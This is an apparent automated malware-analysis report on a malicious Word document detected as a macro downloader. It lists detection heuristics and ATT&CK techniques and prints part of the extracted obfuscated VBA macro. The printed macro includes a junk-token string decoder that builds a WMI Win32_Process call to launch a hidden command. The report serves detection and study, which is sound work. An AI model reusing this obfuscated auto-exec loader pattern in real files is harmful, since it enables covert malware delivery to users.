MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution: Malicious Macro
The sample is a malicious Office document containing obfuscated VBA macros. The 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the macros are designed to auto-execute and use CreateObject and Shell functions to run a payload. The ClamAV detection of 'Doc.Downloader.Sagent-7178142-0' further confirms its malicious nature as a downloader.
Heuristics 8
-
ClamAV: Doc.Downloader.Sagent-7178142-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-7178142-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29357 bytes |
SHA-256: 098609d902136d4c544612c3f299c48a5d07630da5f8859d62066c872eb86954 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "iP_UasF2, 0, 0, MSForms, TextBox"
Attribute VB_Control = "KzP19Z, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Fic3Oic, 2, 2, MSForms, TextBox"
Attribute VB_Control = "sAKWAi3, 3, 3, MSForms, TextBox"
Attribute VB_Control = "dpiNz7Li, 4, 4, MSForms, TextBox"
Attribute VB_Control = "iXT9cI, 5, 5, MSForms, TextBox"
Attribute VB_Control = "wHbUXGq, 6, 6, MSForms, TextBox"
Attribute VB_Control = "EAmMKG9, 7, 7, MSForms, TextBox"
Attribute VB_Control = "s9dsN64, 8, 8, MSForms, TextBox"
Attribute VB_Control = "XEtisF4, 9, 9, MSForms, TextBox"
Attribute VB_Control = "mNisohpn, 10, 10, MSForms, TextBox"
Attribute VB_Control = "VwmUsJ, 11, 11, MSForms, TextBox"
Attribute VB_Control = "OV5XEB, 12, 12, MSForms, TextBox"
Attribute VB_Control = "RG2GZfYp, 13, 13, MSForms, TextBox"
Attribute VB_Control = "NfTYr68p, 14, 14, MSForms, TextBox"
Attribute VB_Control = "pLFXtJs, 15, 15, MSForms, TextBox"
Attribute VB_Control = "G31fts1, 16, 16, MSForms, TextBox"
Attribute VB_Control = "NtI9sr9, 17, 17, MSForms, TextBox"
Attribute VB_Control = "OcXikq8w, 18, 18, MSForms, TextBox"
Attribute VB_Control = "IJiF_T, 19, 19, MSForms, TextBox"
Attribute VB_Name = "mow_7p4"
Function A38vzGq()
On Error Resume Next
Do
If ObQzzwn2 = q8IS5v Then
JjUp9Fp = RRI4wnn _
- Hex(51 + Oct(960 / Round(372))) _
+ 287 - Fix(uQEYVf) - 81 - vcBomQ _
- uPYmiKIw * Sin(dhMCUf)
sTbwLzco = Tan(544)
End If
w5tBs6 = MprtIRJ _
* Round(jI4Hjm4Z) / EEjK1A6 / cizSJ8 + (CHLJoH4 _
/ Sin(OFcR2ml) / 921 * Sin(Qqi2tOc1))
For Each s2tLQO1 In Ub8qYVtz
k8O7Wn = KZ8sznf5 * Round(vMDBVp0) _
/ AGfAaFz / j6XiqVn + (jnUKfqK5 / Sin(jmk9_Qkw) _
/ 470 * Sin(bmB1ERv))
Next
Loop Until bsYcpRu = f11j7zG1
j_iIutj = XJEwbR + XsNNa_s(ThisDocument.NfTYr68p + ThisDocument.EAmMKG9) + isF6qlw
On Error Resume Next
Do
If Su3AIKi = qKtdHp Then
ztDYt7iF = AHzaFwwz _
- Hex(402 + Oct(799 / Round(831))) _
+ 174 - Fix(TwriHZ_j) - 198 - zZTiFLYA _
- Q6oddDSZ * Sin(iV1KbMBj)
zBqqtl = Tan(431)
End If
Q5XwJB = GNAEGkc _
* Round(hjIG5J) / Q3SO0v3O / Ik3Mzm + (qjMNWk _
/ Sin(DCrKauj) / 91 * Sin(IQOJdJ2F))
For Each tTbvjJ In NiGfsAd
c2paAwXp = vVZWI2SW * Round(OKBlZTj) _
/ cOrwTSO / tfEFKZ6A + (woZpQC / Sin(rDBrSo_) _
/ 347 * Sin(LhGD5_b))
Next
Loop Until dMAmqYdU = Hkbwv7
CreateObject(XsNNa_s("yiwawiyiwayiwayiwanmgmyiwatsyiwayiwa:yiwayiwaWiyiwayiwanyiwa3yiwa2yiwa_yiwaProyiwaceyiwassyiwayiwa")).Create j_iIutj, z0a9o4, ArdSEzl, sGjXiKtT
On Error Resume Next
Do
If U_kcW2CV = bZsizMmf Then
Y8jTzZWS = zsENVMG6 _
- Hex(781 + Oct(402 / Round(229))) _
+ 544 - Fix(r8J2pAi) - 47 - RjKi_Ob _
- i8fvwP * Sin(RfIlGrr8)
ptpz752 = Tan(263)
End If
qOE_6w1 = DEL5I2p_ _
* Round(Mzdh7ros) / Bl5jw5lQ / rRb15_ + (izH8kAAp _
/ Sin(HTQDNW1d) / 125 * Sin(GOQZiFA))
For Each jo7UvHw In B5jHh5
wwDF_a = nWjtdiAC * Round(CO_f7akv) _
/ HBsWRR / vSoNFm + (MDmi5d1w / Sin(Ld2njO_i) _
/ 46 * Sin(hMbLWwI0))
Next
Loop Until HXfKLjI5 = J5hYDpYR
On Error Resume Next
Do
If nipBXKj = QGYX5iO Then
U6_qAa = LKhpvTa _
- Hex(34 + Oct(651 / Round(235))) _
+ 922 - Fix(sqJJis_) - 216 - j7wimiw _
- UiEiPo * Sin(RL_iz0JY)
W06MAni = Tan(593)
End If
lujD3jI = WXbfPhXz _
* Round(u9nF66WQ) / Zc_fLM / GHCp8Z9U + (lXzMjj2f _
/ Sin(iIfP31Q) / 641 * Sin(wTDUmr8))
For Each ANHkzb In TS5iprGj
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.